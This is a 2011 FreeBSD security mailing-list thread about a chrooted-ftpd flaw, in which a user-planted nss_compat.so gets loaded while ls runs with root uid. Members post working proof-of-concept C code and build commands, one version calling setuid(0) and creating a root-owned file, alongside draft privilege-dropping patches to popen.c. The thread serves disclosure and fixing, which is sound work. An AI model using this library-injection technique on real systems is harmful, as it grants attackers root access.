From owner-freebsd-security@FreeBSD.ORG Wed Nov 30 20:00:23 2011 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 678F5106564A for ; Wed, 30 Nov 2011 20:00:23 +0000 (UTC) (envelope-from mike@sentex.net) Received: from smarthost1.sentex.ca (smarthost1-6.sentex.ca [IPv6:2607:f3e0:0:1::12]) by mx1.freebsd.org (Postfix) with ESMTP id 124098FC08 for ; Wed, 30 Nov 2011 20:00:22 +0000 (UTC) Received: from [IPv6:2607:f3e0:0:4:f025:8813:7603:7e4a] (saphire3.sentex.ca [IPv6:2607:f3e0:0:4:f025:8813:7603:7e4a]) by smarthost1.sentex.ca (8.14.5/8.14.4) with ESMTP id pAUK0Lus031887 for ; Wed, 30 Nov 2011 15:00:21 -0500 (EST) (envelope-from mike@sentex.net) Message-ID: <4ED68B4D.4020004@sentex.net> Date: Wed, 30 Nov 2011 15:00:13 -0500 From: Mike Tancsa Organization: Sentex Communications User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101207 Thunderbird/3.1.7 MIME-Version: 1.0 To: "freebsd-security@freebsd.org" X-Enigmail-Version: 1.1.1 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Scanned-By: MIMEDefang 2.71 on IPv6:2607:f3e0:0:1::12 Subject: ftpd security issue ? X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 30 Nov 2011 20:00:23 -0000 Saw this on FD... Anyone know any more details about this ? http://lists.grok.org.uk/pipermail/full-disclosure/2011-November/084372.html ---Mike -- ------------------- Mike Tancsa, tel +1 519 651 3400 Sentex Communications, mike@sentex.net Providing Internet services since 1994 www.sentex.net Cambridge, Ontario Canada http://www.tancsa.com/ From owner-freebsd-security@FreeBSD.ORG Wed Nov 30 21:09:17 2011 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id DE3B8106566B for ; Wed, 30 Nov 2011 21:09:17 +0000 (UTC) (envelope-from przemyslaw@frasunek.com) Received: from lagoon.freebsd.lublin.pl (lagoon.freebsd.lublin.pl [IPv6:2a02:2928:a::3]) by mx1.freebsd.org (Postfix) with ESMTP id 6898B8FC16 for ; Wed, 30 Nov 2011 21:09:17 +0000 (UTC) Received: from [IPv6:2a02:2928:a:ffff:85e8:10d:f67d:c7ee] (unknown [IPv6:2a02:2928:a:ffff:85e8:10d:f67d:c7ee]) by lagoon.freebsd.lublin.pl (Postfix) with ESMTPSA id BFAB5239453; Wed, 30 Nov 2011 22:09:15 +0100 (CET) Message-ID: <4ED69B7E.50505@frasunek.com> Date: Wed, 30 Nov 2011 22:09:18 +0100 From: Przemyslaw Frasunek Organization: frasunek.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20111105 Thunderbird/8.0 MIME-Version: 1.0 To: Mike Tancsa References: <4ED68B4D.4020004@sentex.net> In-Reply-To: <4ED68B4D.4020004@sentex.net> X-Enigmail-Version: 1.3.3 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Cc: "freebsd-security@freebsd.org" Subject: Re: ftpd security issue ? X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 30 Nov 2011 21:09:17 -0000 > Saw this on FD... Anyone know any more details about this ? > http://lists.grok.org.uk/pipermail/full-disclosure/2011-November/084372.html This is a well known hazard of chrooting to directories controlled by unprivileged users. In this case, vulnerability exists because ftpd calls /bin/ls with uid=0 and euid!=0 when STAT command is issued, and nss_compat.so is loaded by libc regardless of elevated privileges. This can be proven by creating dummy ~/lib/nss_compat.so.1: [venglin@lagoon ~/lib]$ cat dummy.c #include #include void _init() { FILE *fp = fopen("asdf", "w+"); fprintf(fp, "%d %d\n", getuid(), geteuid()); } [venglin@lagoon ~/lib]$ cc -o dummy.o -c dummy.c -fPIC [venglin@lagoon ~/lib]$ cc -shared -Wl,-soname,dummy.so -o dummy.so dummy.o -nostartfiles [venglin@lagoon ~/lib]$ mv dummy.so nss_compat.so.1 And after calling STAT command: [venglin@lagoon ~/lib]$ cat ~/asdf 0 3000 BTW. This vulnerability affects only configurations, where /etc/ftpchroot exists or anonymous user is allowed to create files inside etc and lib dirs. -- * Fido: 2:480/124 ** WWW: http://www.frasunek.com ** NICHDL: PMF9-RIPE * * Jabber ID: venglin@nette.pl ** PGP ID: 2578FCAD ** HAM-RADIO: SQ5JIV * From owner-freebsd-security@FreeBSD.ORG Thu Dec 1 00:01:11 2011 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 7ECB11065679; Thu, 1 Dec 2011 00:01:11 +0000 (UTC) (envelope-from delphij@delphij.net) Received: from anubis.delphij.net (anubis.delphij.net [IPv6:2001:470:1:117::25]) by mx1.freebsd.org (Postfix) with ESMTP id 60EA58FC17; Thu, 1 Dec 2011 00:01:11 +0000 (UTC) Received: from delta.delphij.net (drawbridge.ixsystems.com [206.40.55.65]) (using TLSv1 with cipher DHE-RSA-CAMELLIA256-SHA (256/256 bits)) (No client certificate requested) by anubis.delphij.net (Postfix) with ESMTPSA id 0C88BE4B4; Wed, 30 Nov 2011 16:01:11 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=simple/simple; d=delphij.net; s=anubis; t=1322697671; bh=LLamM2fTKKrTE/G/L3h8iYACQg1ZCdduD65wZ6cps3Q=; h=Message-ID:Date:From:Reply-To:MIME-Version:To:CC:Subject: References:In-Reply-To:Content-Type; b=GK1ZFVK88MaY3fnPqRpdnbGXdgQdVkmJYbXtAGKjj8JK15rVPlES2VMcuoUYzGBQq C1mfN0nDXrD/wDMZzJB0/IKsWXoU2V+uOHSRvhkUHDh9o2TUr2iT/heiMme0JxvKdb LIeVnV7CQ/UMJN+LzseY19L1DC/tG+vggIaqx6iY= Message-ID: <4ED6C3C6.5030402@delphij.net> Date: Wed, 30 Nov 2011 16:01:10 -0800 From: Xin LI Organization: The FreeBSD Project MIME-Version: 1.0 To: Przemyslaw Frasunek References: <4ED68B4D.4020004@sentex.net> <4ED69B7E.50505@frasunek.com> In-Reply-To: <4ED69B7E.50505@frasunek.com> OpenPGP: id=3FCA37C1; url=http://www.delphij.net/delphij.asc Content-Type: multipart/mixed; boundary="------------080501020601020809040406" Cc: "freebsd-security@freebsd.org" Subject: Re: ftpd security issue ? X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list Reply-To: d@delphij.net List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 01 Dec 2011 00:01:11 -0000 This is a multi-part message in MIME format. --------------080501020601020809040406 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 On 11/30/11 13:09, Przemyslaw Frasunek wrote: >> Saw this on FD... Anyone know any more details about this ? >> http://lists.grok.org.uk/pipermail/full-disclosure/2011-November/084372.html > >> > This is a well known hazard of chrooting to directories controlled > by unprivileged users. In this case, vulnerability exists because > ftpd calls /bin/ls with uid=0 and euid!=0 when STAT command is > issued, and nss_compat.so is loaded by libc regardless of elevated > privileges. > > This can be proven by creating dummy ~/lib/nss_compat.so.1: > > [venglin@lagoon ~/lib]$ cat dummy.c #include #include > > > void _init() { FILE *fp = fopen("asdf", "w+"); fprintf(fp, "%d > %d\n", getuid(), geteuid()); } [venglin@lagoon ~/lib]$ cc -o > dummy.o -c dummy.c -fPIC [venglin@lagoon ~/lib]$ cc -shared > -Wl,-soname,dummy.so -o dummy.so dummy.o -nostartfiles > [venglin@lagoon ~/lib]$ mv dummy.so nss_compat.so.1 > > And after calling STAT command: > > [venglin@lagoon ~/lib]$ cat ~/asdf 0 3000 > > BTW. This vulnerability affects only configurations, where > /etc/ftpchroot exists or anonymous user is allowed to create files > inside etc and lib dirs. This doesn't seem to be typical configuration or no? Will the attached patch fix the problem? (I think libc should just refuse /etc/nsswitch.conf and libraries if they are writable by others by the way) Cheers, - -- Xin LI https://www.delphij.net/ FreeBSD - The Power to Serve! Live free or die -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.18 (FreeBSD) iQEcBAEBCAAGBQJO1sPFAAoJEATO+BI/yjfBe+kIANGf3sEKV2iEXnhOEzEJkQFr qOm5niYdxwrnmQ4tjU19Ny+RZ5C9QyIcsvZeYJHLY3AvHGcxKCDc+BfAqHvBbxqF JC1/CbdnflUp3VpNnTvXIkN1/upcZXRU9BmVOXHYg7Ycqrqhom7+57hza2zSZxHO UlKXzLD3O3NIPMgkliJ9YwpsNr4dDrpCItVddWC3yENV33Qc9rOFLMzlwP6qk5Ib XxzCHqg7nNioKDZ0KUeFsSEtk7xT6l5nmRIGQz+YN4CyLWjuZf5EspZSha5VFwwO H+VSvl339AMJDRMUa2g4mLbjpHjYyZAPw+fM+SxPuC4Js1MrhkseZLPAQeoaEWg= =wDbK -----END PGP SIGNATURE----- --------------080501020601020809040406 Content-Type: text/plain; name="popen.diff" Content-Transfer-Encoding: 7bit Content-Disposition: attachment; filename="popen.diff" Index: libexec/ftpd/popen.c =================================================================== --- libexec/ftpd/popen.c (revision 228156) +++ libexec/ftpd/popen.c (working copy) @@ -157,6 +157,7 @@ ftpd_popen(char *program, char *type) } exit(ls_main(gargc, gargv)); } + setuid(geteuid()); execv(gargv[0], gargv); _exit(1); } --------------080501020601020809040406-- From owner-freebsd-security@FreeBSD.ORG Thu Dec 1 01:01:19 2011 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 9E46E106564A for ; Thu, 1 Dec 2011 01:01:19 +0000 (UTC) (envelope-from mike@sentex.net) Received: from smarthost1.sentex.ca (smarthost1-6.sentex.ca [IPv6:2607:f3e0:0:1::12]) by mx1.freebsd.org (Postfix) with ESMTP id 6118D8FC16 for ; Thu, 1 Dec 2011 01:01:19 +0000 (UTC) Received: from [IPv6:2607:f3e0:0:4:f025:8813:7603:7e4a] (saphire3.sentex.ca [IPv6:2607:f3e0:0:4:f025:8813:7603:7e4a]) by smarthost1.sentex.ca (8.14.5/8.14.4) with ESMTP id pB11197U067684; Wed, 30 Nov 2011 20:01:09 -0500 (EST) (envelope-from mike@sentex.net) Message-ID: <4ED6D1CD.9080700@sentex.net> Date: Wed, 30 Nov 2011 20:01:01 -0500 From: Mike Tancsa Organization: Sentex Communications User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101207 Thunderbird/3.1.7 MIME-Version: 1.0 To: d@delphij.net References: <4ED68B4D.4020004@sentex.net> <4ED69B7E.50505@frasunek.com> <4ED6C3C6.5030402@delphij.net> In-Reply-To: <4ED6C3C6.5030402@delphij.net> X-Enigmail-Version: 1.1.1 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Scanned-By: MIMEDefang 2.71 on IPv6:2607:f3e0:0:1::12 Cc: "freebsd-security@freebsd.org" , Xin LI , Przemyslaw Frasunek Subject: Re: ftpd security issue ? X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 01 Dec 2011 01:01:19 -0000 On 11/30/2011 7:01 PM, Xin LI wrote: > >> BTW. This vulnerability affects only configurations, where >> /etc/ftpchroot exists or anonymous user is allowed to create files >> inside etc and lib dirs. > > This doesn't seem to be typical configuration or no? I think in shared hosting environments it would be somewhat common. For annon ftp, I dont think the anon user would be able to create / write to a lib directory. > > Will the attached patch fix the problem? > > (I think libc should just refuse /etc/nsswitch.conf and libraries if > they are writable by others by the way) It does not seem to prevent the issue for me. Using Przemyslaw program's, #include #include void _init() { setuid(0); setgid(0); FILE *fp = fopen("/newfile", "w+"); fprintf(fp, "%d %d\n", getuid(), geteuid()); } cc -o dummy.o -c dummy.c -fPIC ; cc -shared -Wl,-soname,dummy.so -o dummy.so dummy.o -nostartfiles ; mv dummy.so ~testuser/lib/nss_compat.so.1 ; chown testuser ~testuser/lib/nss_compat.so.1 ftp localhost Trying 127.0.0.1... Connected to localhost. 220 vmtest.localdomain FTP server (Version 6.00LS) ready. Name (localhost:mdtancsa): testuser 331 Password required for testuser. Password: 230 User testuser logged in, access restrictions apply. Remote system type is UNIX. Using binary mode to transfer files. ftp> dir 229 Entering Extended Passive Mode (|||62436|) 150 Opening ASCII mode data connection for '/bin/ls'. total 106 -rw-r--r-- 1 1002 1002 763 Nov 30 15:17 .cshrc -rw------- 1 1002 1002 193 Nov 30 16:36 .history drwxr-xr-x 2 1002 1002 512 Nov 30 16:05 etc -r-xr-xr-x 1 0 1002 95076 Nov 30 19:50 ftpd drwxr-xr-x 2 1002 1002 512 Nov 30 19:56 lib -rw-r--r-- 1 0 1002 79 Nov 30 16:34 t.c -rwxr-xr-x 1 0 1002 24 Nov 30 16:37 t.sh 226 Transfer complete. ftp> dir 229 Entering Extended Passive Mode (|||50577|) 150 Opening ASCII mode data connection for '/bin/ls'. total 108 -rw-r--r-- 1 1002 1002 763 Nov 30 15:17 .cshrc -rw------- 1 1002 1002 193 Nov 30 16:36 .history drwxr-xr-x 2 1002 1002 512 Nov 30 16:05 etc -r-xr-xr-x 1 0 1002 95076 Nov 30 19:50 ftpd drwxr-xr-x 2 1002 1002 512 Nov 30 19:56 lib -rw-r--r-- 1 0 1002 4 Nov 30 19:58 newfile -rw-r--r-- 1 0 1002 79 Nov 30 16:34 t.c -rwxr-xr-x 1 0 1002 24 Nov 30 16:37 t.sh 226 Transfer complete. ftp> the file created is root -- ------------------- Mike Tancsa, tel +1 519 651 3400 Sentex Communications, mike@sentex.net Providing Internet services since 1994 www.sentex.net Cambridge, Ontario Canada http://www.tancsa.com/ From owner-freebsd-security@FreeBSD.ORG Thu Dec 1 01:16:40 2011 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 4A6E5106566B for ; Thu, 1 Dec 2011 01:16:40 +0000 (UTC) (envelope-from delphij@delphij.net) Received: from anubis.delphij.net (anubis.delphij.net [IPv6:2001:470:1:117::25]) by mx1.freebsd.org (Postfix) with ESMTP id 2B7FB8FC0C for ; Thu, 1 Dec 2011 01:16:40 +0000 (UTC) Received: from delta.delphij.net (drawbridge.ixsystems.com [206.40.55.65]) (using TLSv1 with cipher DHE-RSA-CAMELLIA256-SHA (256/256 bits)) (No client certificate requested) by anubis.delphij.net (Postfix) with ESMTPSA id D966CE945; Wed, 30 Nov 2011 17:16:39 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=simple/simple; d=delphij.net; s=anubis; t=1322702200; bh=W4QZ4rjxAasDaF03PR77vtaLGZFcD0byAQWHGj0NMfY=; h=Message-ID:Date:From:Reply-To:MIME-Version:To:CC:Subject: References:In-Reply-To:Content-Type; b=qy7zHVlkPMVvFmVcfI50sU0vHcfFSs9fzvILer3w9NvbGwrzBatowGwVvbd5KKtJc o9mrUkOCBIa507hwO8Zlw/ACBBANhr3T1hJs/AwLbuaoo3r0adJCrDTORO5eAVamz8 uyEButvN+HSnECzWv6n0bokCdno56kCKlWKPQCQ0= Message-ID: <4ED6D577.9010007@delphij.net> Date: Wed, 30 Nov 2011 17:16:39 -0800 From: Xin LI Organization: The FreeBSD Project MIME-Version: 1.0 To: Mike Tancsa References: <4ED68B4D.4020004@sentex.net> <4ED69B7E.50505@frasunek.com> <4ED6C3C6.5030402@delphij.net> <4ED6D1CD.9080700@sentex.net> In-Reply-To: <4ED6D1CD.9080700@sentex.net> OpenPGP: id=3FCA37C1; url=http://www.delphij.net/delphij.asc Content-Type: multipart/mixed; boundary="------------050602040905040808070901" Cc: "freebsd-security@freebsd.org" , d@delphij.net, Przemyslaw Frasunek Subject: Re: ftpd security issue ? X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list Reply-To: d@delphij.net List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 01 Dec 2011 01:16:40 -0000 This is a multi-part message in MIME format. --------------050602040905040808070901 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 On 11/30/11 17:01, Mike Tancsa wrote: > On 11/30/2011 7:01 PM, Xin LI wrote: >> >>> BTW. This vulnerability affects only configurations, where >>> /etc/ftpchroot exists or anonymous user is allowed to create >>> files inside etc and lib dirs. >> >> This doesn't seem to be typical configuration or no? > > I think in shared hosting environments it would be somewhat common. > For annon ftp, I dont think the anon user would be able to create / > write to a lib directory. > >> >> Will the attached patch fix the problem? >> >> (I think libc should just refuse /etc/nsswitch.conf and libraries >> if they are writable by others by the way) > > It does not seem to prevent the issue for me. Using Przemyslaw > program's, Sorry I patched at the wrong place, this one should do. Note however this is not sufficient to fix the problem, for instance one can still upload .so's that run arbitrary code at his privilege, which has to be addressed in libc. I need some time to play around with libc to really fix this one. Cheers, - -- Xin LI https://www.delphij.net/ FreeBSD - The Power to Serve! Live free or die -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.18 (FreeBSD) iQEcBAEBCAAGBQJO1tV2AAoJEATO+BI/yjfBua8IAIt5FYjnMswOL/GPwcEaJaAJ reZxS5a1jBtqMOO1RhAlvDK9SVTYhWVOwQLUWmJz7iln+NissW9fQeYyG6bmfRxX l583Aiobk1Lgp+HRJQIEj2JjajoZkj7RjUrYa4a8lZQxNmVUXE/RqRgM2/FbuU4C ejQd5xRQdG+kMq9vUmYk4QP7ql32uv48sSTwklau6Jz5zMpXSvvx2awe8aZImB2R pWklWcT4VUSiEbrREvP/ZNJt+BjQAZw3V2Lc0j7c9AbLnj84KRgmUS+dTMTdPoyD nRavZQzppvxRf3tVrth5FuSsIdR5491Sa3ykzFpNKToqY4CtkRvAofZfBx0mQws= =9B6u -----END PGP SIGNATURE----- --------------050602040905040808070901 Content-Type: text/plain; name="popen.diff" Content-Transfer-Encoding: 7bit Content-Disposition: attachment; filename="popen.diff" Index: libexec/ftpd/popen.c =================================================================== --- libexec/ftpd/popen.c (revision 228164) +++ libexec/ftpd/popen.c (working copy) @@ -143,6 +143,9 @@ } (void)close(pdes[1]); } + /* Drop privileges before proceeding */ + if (getuid() != geteuid() && setuid(geteuid()) < 0) + _exit(1); if (strcmp(gargv[0], _PATH_LS) == 0) { /* Reset getopt for ls_main() */ optreset = optind = optopt = 1; --------------050602040905040808070901-- From owner-freebsd-security@FreeBSD.ORG Thu Dec 1 01:30:02 2011 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 24DE11065677 for ; Thu, 1 Dec 2011 01:30:02 +0000 (UTC) (envelope-from titus@buko.edc.ro) Received: from ns.edc.ro (ns.edc.ro [81.196.179.6]) by mx1.freebsd.org (Postfix) with ESMTP id B4A4C8FC0A for ; Thu, 1 Dec 2011 01:30:01 +0000 (UTC) Received: from buko.edc.ro ([86.122.169.89]) by ns.edc.ro (8.13.8/8.12.6) with ESMTP id pB11Au8X045817 for ; Thu, 1 Dec 2011 03:10:56 +0200 (EET) (envelope-from titus@buko.edc.ro) X-Virus-Status: Clean X-Virus-Scanned: clamav-milter 0.97 at unix.edc.ro Received: from buko.edc.ro (localhost [127.0.0.1]) by buko.edc.ro (8.13.8/8.13.1) with ESMTP id pB11AuQC067175 for ; Thu, 1 Dec 2011 03:10:56 +0200 (EET) (envelope-from titus@buko.edc.ro) X-Virus-Status: Clean X-Virus-Scanned: clamav-milter 0.97 at buko.edc.ro Received: (from titus@localhost) by buko.edc.ro (8.13.8/8.13.1/Submit) id pB11AtuS067174 for freebsd-security@freebsd.org; Thu, 1 Dec 2011 03:10:55 +0200 (EET) (envelope-from titus) Date: Thu, 1 Dec 2011 03:10:55 +0200 From: Titus Manea To: freebsd-security@freebsd.org Message-ID: <20111201031055.A67122@buko.edc.ro> References: <4ED68B4D.4020004@sentex.net> <4ED69B7E.50505@frasunek.com> <4ED6C3C6.5030402@delphij.net> <4ED6D1CD.9080700@sentex.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <4ED6D1CD.9080700@sentex.net>; from mike@sentex.net on Wed, Nov 30, 2011 at 08:01:01PM -0500 X-Greylist: IP, sender and recipient auto-whitelisted, not delayed by milter-greylist-2.0.2 (ns.edc.ro [81.196.179.6]); Thu, 01 Dec 2011 03:10:56 +0200 (EET) Subject: Re: ftpd security issue ? X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 01 Dec 2011 01:30:02 -0000 Move the seteuid pid = (strcmp(gargv[0], _PATH_LS) == 0) ? fork() : vfork(); switch(pid) { case -1: /* error */ (void)close(pdes[0]); (void)close(pdes[1]); goto pfree; /* NOTREACHED */ case 0: /* child */ setuid(geteuid()); On Wed, Nov 30, 2011 at 08:01:01PM -0500, Mike Tancsa wrote: > On 11/30/2011 7:01 PM, Xin LI wrote: > > > >> BTW. This vulnerability affects only configurations, where > >> /etc/ftpchroot exists or anonymous user is allowed to create files > >> inside etc and lib dirs. > > > > This doesn't seem to be typical configuration or no? > > I think in shared hosting environments it would be somewhat common. For > annon ftp, I dont think the anon user would be able to create / write to > a lib directory. > > > > > Will the attached patch fix the problem? > > > > (I think libc should just refuse /etc/nsswitch.conf and libraries if > > they are writable by others by the way) > > It does not seem to prevent the issue for me. Using Przemyslaw program's, > > #include > #include > > void _init() { > setuid(0); > setgid(0); > FILE *fp = fopen("/newfile", "w+"); > fprintf(fp, "%d %d\n", getuid(), geteuid()); > } > > cc -o dummy.o -c dummy.c -fPIC ; cc -shared -Wl,-soname,dummy.so -o > dummy.so dummy.o -nostartfiles ; mv dummy.so > ~testuser/lib/nss_compat.so.1 ; chown testuser ~testuser/lib/nss_compat.so.1 > > > ftp localhost > Trying 127.0.0.1... > Connected to localhost. > 220 vmtest.localdomain FTP server (Version 6.00LS) ready. > Name (localhost:mdtancsa): testuser > 331 Password required for testuser. > Password: > 230 User testuser logged in, access restrictions apply. > Remote system type is UNIX. > Using binary mode to transfer files. > ftp> dir > 229 Entering Extended Passive Mode (|||62436|) > 150 Opening ASCII mode data connection for '/bin/ls'. > total 106 > -rw-r--r-- 1 1002 1002 763 Nov 30 15:17 .cshrc > -rw------- 1 1002 1002 193 Nov 30 16:36 .history > drwxr-xr-x 2 1002 1002 512 Nov 30 16:05 etc > -r-xr-xr-x 1 0 1002 95076 Nov 30 19:50 ftpd > drwxr-xr-x 2 1002 1002 512 Nov 30 19:56 lib > -rw-r--r-- 1 0 1002 79 Nov 30 16:34 t.c > -rwxr-xr-x 1 0 1002 24 Nov 30 16:37 t.sh > 226 Transfer complete. > ftp> dir > 229 Entering Extended Passive Mode (|||50577|) > 150 Opening ASCII mode data connection for '/bin/ls'. > total 108 > -rw-r--r-- 1 1002 1002 763 Nov 30 15:17 .cshrc > -rw------- 1 1002 1002 193 Nov 30 16:36 .history > drwxr-xr-x 2 1002 1002 512 Nov 30 16:05 etc > -r-xr-xr-x 1 0 1002 95076 Nov 30 19:50 ftpd > drwxr-xr-x 2 1002 1002 512 Nov 30 19:56 lib > -rw-r--r-- 1 0 1002 4 Nov 30 19:58 newfile > -rw-r--r-- 1 0 1002 79 Nov 30 16:34 t.c > -rwxr-xr-x 1 0 1002 24 Nov 30 16:37 t.sh > 226 Transfer complete. > ftp> > > the file created is root > > > -- > ------------------- > Mike Tancsa, tel +1 519 651 3400 > Sentex Communications, mike@sentex.net > Providing Internet services since 1994 www.sentex.net > Cambridge, Ontario Canada http://www.tancsa.com/ > _______________________________________________ > freebsd-security@freebsd.org mailing list > http://lists.freebsd.org/mailman/listinfo/freebsd-security > To unsubscribe, send any mail to "freebsd-security-unsubscribe@freebsd.org" -- --------------------------------------------------------------------- How an engineer writes a program: Starts by debugging an empty file... Titus Manea | Eastern Digital Inc. From owner-freebsd-security@FreeBSD.ORG Thu Dec 1 01:38:13 2011 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id C02601065670 for ; Thu, 1 Dec 2011 01:38:13 +0000 (UTC) (envelope-from mike@sentex.net) Received: from smarthost1.sentex.ca (smarthost1-6.sentex.ca [IPv6:2607:f3e0:0:1::12]) by mx1.freebsd.org (Postfix) with ESMTP id 824538FC0C for ; Thu, 1 Dec 2011 01:38:13 +0000 (UTC) Received: from [IPv6:2607:f3e0:0:4:f025:8813:7603:7e4a] (saphire3.sentex.ca [IPv6:2607:f3e0:0:4:f025:8813:7603:7e4a]) by smarthost1.sentex.ca (8.14.5/8.14.4) with ESMTP id pB11c5HP070347; Wed, 30 Nov 2011 20:38:06 -0500 (EST) (envelope-from mike@sentex.net) Message-ID: <4ED6DA75.30604@sentex.net> Date: Wed, 30 Nov 2011 20:37:57 -0500 From: Mike Tancsa Organization: Sentex Communications User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101207 Thunderbird/3.1.7 MIME-Version: 1.0 To: d@delphij.net References: <4ED68B4D.4020004@sentex.net> <4ED69B7E.50505@frasunek.com> <4ED6C3C6.5030402@delphij.net> <4ED6D1CD.9080700@sentex.net> <4ED6D577.9010007@delphij.net> In-Reply-To: <4ED6D577.9010007@delphij.net> X-Enigmail-Version: 1.1.1 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Scanned-By: MIMEDefang 2.71 on IPv6:2607:f3e0:0:1::12 Cc: "freebsd-security@freebsd.org" , Xin LI , Przemyslaw Frasunek Subject: Re: ftpd security issue ? X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 01 Dec 2011 01:38:13 -0000 On 11/30/2011 8:16 PM, Xin LI wrote: > > Sorry I patched at the wrong place, this one should do. > > Note however this is not sufficient to fix the problem, for instance > one can still upload .so's that run arbitrary code at his privilege, > which has to be addressed in libc. I need some time to play around > with libc to really fix this one. Hi, Yes, that looks better! With respect to users uploading .so files, I guess why not just upload executables directly ? Although I suppose if they are not allowed to execute anything, this would be a way around that. Now to prod the proftpd folks ---Mike -- ------------------- Mike Tancsa, tel +1 519 651 3400 Sentex Communications, mike@sentex.net Providing Internet services since 1994 www.sentex.net Cambridge, Ontario Canada http://www.tancsa.com/